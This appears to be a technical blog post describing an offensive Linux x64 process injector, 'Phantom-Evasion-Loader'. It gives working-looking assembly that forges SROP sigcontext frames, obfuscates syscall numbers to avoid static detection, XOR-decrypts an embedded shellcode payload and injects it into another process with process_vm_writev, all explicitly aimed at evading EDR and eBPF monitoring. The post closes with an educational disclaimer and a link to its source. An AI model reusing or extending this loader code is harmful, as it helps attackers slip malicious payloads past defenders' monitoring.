Research Context
When developing offensive security tools—specifically loaders and C2 agents—the biggest hurdle is always the noise you generate. Modern EDRs, Falco eBPF monitors, and kernel-level telemetry are incredibly adept at catching standard injection techniques. If you use standard ptrace routines (like PTRACE_POKEDATA) or rely on high-level C libraries (libc), you light up monitoring dashboards like a Christmas tree.
While architecting the Phantom-Evasion-Loader, a standalone x64 Advanced Process Injector, I wanted to drastically reduce this detection surface. The solution? Dropping libc entirely and writing pure x64 Assembly. But pure Assembly isn’t enough; you need the right execution flows.
In modern malware architecture, two techniques are heavily utilized to achieve this stealth: SROP (Sigreturn Oriented Programming) and Zero-Copy Injection via process_vm_writev. Here is how they work together, and the debugging hell required to implement them.
Context Hijacking: Why SROP?
Normally, when you invoke a syscall, EDRs hook the transition points to inspect what you are doing. SROP flips this dynamic.
SROP leverages rt_sigreturn (Syscall 15). In a legitimate UNIX environment, when a signal handler finishes, sigreturn is called to restore the CPU to its exact state before the interrupt. It does this by popping an entire sigcontext structure (containing all register values) directly from the stack into the CPU registers.
By artificially crafting a fake sigcontext frame on the stack and calling rt_sigreturn, we achieve arbitrary context hijacking.
- The Advantage: We hide the actual syscall we want to execute. Instead of sequentially setting up registers for a malicious call and triggering a
syscallinstruction that gets flagged, we just format the stack.sigreturndumps those values directly into the CPU, instantly transitioning execution to our desired state with our desired syscall loaded intorax. It significantly minimizesptracenoise and context hijacking footprints.
Real-World SROP Trigger in Pure Assembly
To execute SROP, we must dynamically craft the sigcontext structure. In the snippet below from the Phantom engine, rbp acts as the base pointer for our fake frame. We set our target registers, calculate the rip for the next phase (x8_syscall), pivot the stack pointer (rsp), and call Syscall 15.
Notice how the next syscall (wait4, which is 61) is also slightly obfuscated (58 + 3) to avoid static opcode scanning for obvious syscall numbers.
; --- Real-World SROP Chain Example ---
; Dynamically building the sigcontext and jumping to the next phase
x7_syscall:
syscall ; Execute previous syscall in the chain
; Crafting the fake sigcontext frame (rbp points to our frame base)
mov qword [rbp + 0x68], 9 ; rsi = PTRACE_SINGLESTEP (Offset 0x68)
mov qword [rbp + 0x88], 0 ; rax = 0
mov qword [rbp + 0x38], 0 ; r8 = 0
lea rax, [rel x8_syscall] ; Calculate RIP for the next execution phase
mov [rbp + 0xA8], rax ; rip = x8_syscall (Offset 0xA8 in sigcontext)
mov rsp, rbp ; Align rsp to our crafted sigcontext frame
mov rax, 15 ; __NR_rt_sigreturn (Syscall 15)
syscall ; Trigger SROP. Context is overwritten, execution jumps!
x8_syscall:
; We land here with our registers fully controlled by the SROP frame
syscall
; Obfuscated Syscall Loading
mov rax, 58
add rax, 3 ; rax = 61 (__NR_wait4)
mov rdi, r13 ; rdi = target PID (preserved in r13)
xor rsi, rsi ; wstatus = NULL
xor rdx, rdx ; options = 0
xor r10, r10 ; rusage = NULL
syscall ; Execute wait4
The Silent Courier: process_vm_writev (Syscall 311)
Once you have control, you need to get your payload into the target process. This is where the Zero-Copy technique comes in using process_vm_writev (Syscall 311).
Unlike standard write operations that copy data from user space to a kernel buffer, and then to the target user space, process_vm_writev writes data directly from the local process memory to the remote process memory.
- The Disadvantage: It is strictly a memory write operation. It cannot allocate memory or change execution permissions on its own.
- The Advantage: It completely bypasses
PTRACE_POKEDATAmonitoring. When chained properly, it allows you to slide your XOR-encrypted shellcode into the target space with virtually zero noise.
While Syscall 311 can’t do the job alone, when paired with an SROP chain to handle the memory permissions and execution flow, it becomes a devastatingly quiet injection method.
Real-World Payload Decryption & Zero-Copy Injection
In a practical evasion scenario, the payload should never sit in memory in plaintext. Below is the phase from the Phantom loader where the payload is decrypted in-memory (using a QWORD XOR key) immediately before being silently copied into the target process using process_vm_writev.
By structuring local_iov and remote_iov via relative addressing (rel), we keep the code Position Independent (PIC).
; =========================================================================
; PHASE 3: PAYLOAD DECRYPTION & INJECTION (The 'process_vm_writev' Way)
; =========================================================================
; 1. IN-MEMORY DECRYPTION
; Decrypt the payload within the loader's own memory space first.
mov r12, 1632 ; Payload size (example)
lea r9, [rel c2_payload]
mov r14, 0xACDAABBBA2BC1337 ; 8-Byte (QWORD) XOR Key
_decrypt_local_loop:
mov r10, [r9]
xor r10, r14 ; Decrypt
mov [r9], r10 ; Write decrypted data back to Loader's memory
add r9, 8
sub r12, 8
jg _decrypt_local_loop
; 2. ZERO-COPY INJECTION (process_vm_writev)
lea rax, [rel c2_payload]
mov [rel local_iov], rax ; iov_base = local decrypted payload address
mov qword [rel local_iov + 8], 1632 ; iov_len = Shellcode size
mov rbx, qword [c2_address] ; Remote address (previously allocated via mmap)
mov [rel remote_iov], rbx ; iov_base = Remote target address
mov qword [rel remote_iov + 8], 1632 ; iov_len = Write size
; Fire Syscall 311!
mov rax, 311 ; sys_process_vm_writev
mov rdi, r13 ; Target PID
lea rsi, [rel local_iov] ; Local IOV struct address
mov rdx, 1 ; 1 local IOV
lea r10, [rel remote_iov] ; Remote IOV struct address
mov r8, 1 ; 1 remote IOV
mov r9, 0 ; Flags (0)
syscall
Debugging Hell: Blood, Sweat, and Hidden Opcodes
Writing this logic in pure x64 Assembly is a punishing experience. You are not dealing with compiler warnings; you are dealing with segmentation faults that give you absolutely zero context.
During the debugging phase of the Phantom loader, I lost hours to what I call “invisible opcode” syndrome. Because you are manually aligning the stack for the sigcontext structure, a single misaligned byte or an unnoticeable opcode will cause the kernel to reject the sigreturn or corrupt the execution flow.
I had instances where perfectly logical code would result in a crucial register getting clobbered by an off-by-one error right before the syscall. Human eyes start to glaze over after looking at hex dumps and GDB traces for 8 hours straight.
A Quick Shoutout: I have to give credit where it’s due. When my eyes were bleeding from staring at register states and stack alignments, I fed the raw opcode traces and GDB outputs into Google’s Gemini. It acted as a flawless secondary set of eyes, instantly spotting the microscopic register clashing and opcode misalignments that were burying the payload. If you are doing pure Assembly exploitation, having an AI comb through your opcode offsets is a game-changer.
Conclusion and Open Source
Implementing SROP and Zero-Copy injections in pure, libc-free Assembly is not for the faint of heart. It requires a masochistic love for low-level architecture. However, the resulting stealth makes it highly applicable for testing the resilience of modern EBPF and EDR solutions.
You can examine the full source code, the XOR-decryption logic, and the SROP implementation on my GitHub.
Project: Phantom-Evasion-Loader (Standalone x64)
Disclaimer: This research and the associated source code are intended strictly for educational purposes, authorized security auditing, and developing better defensive heuristics.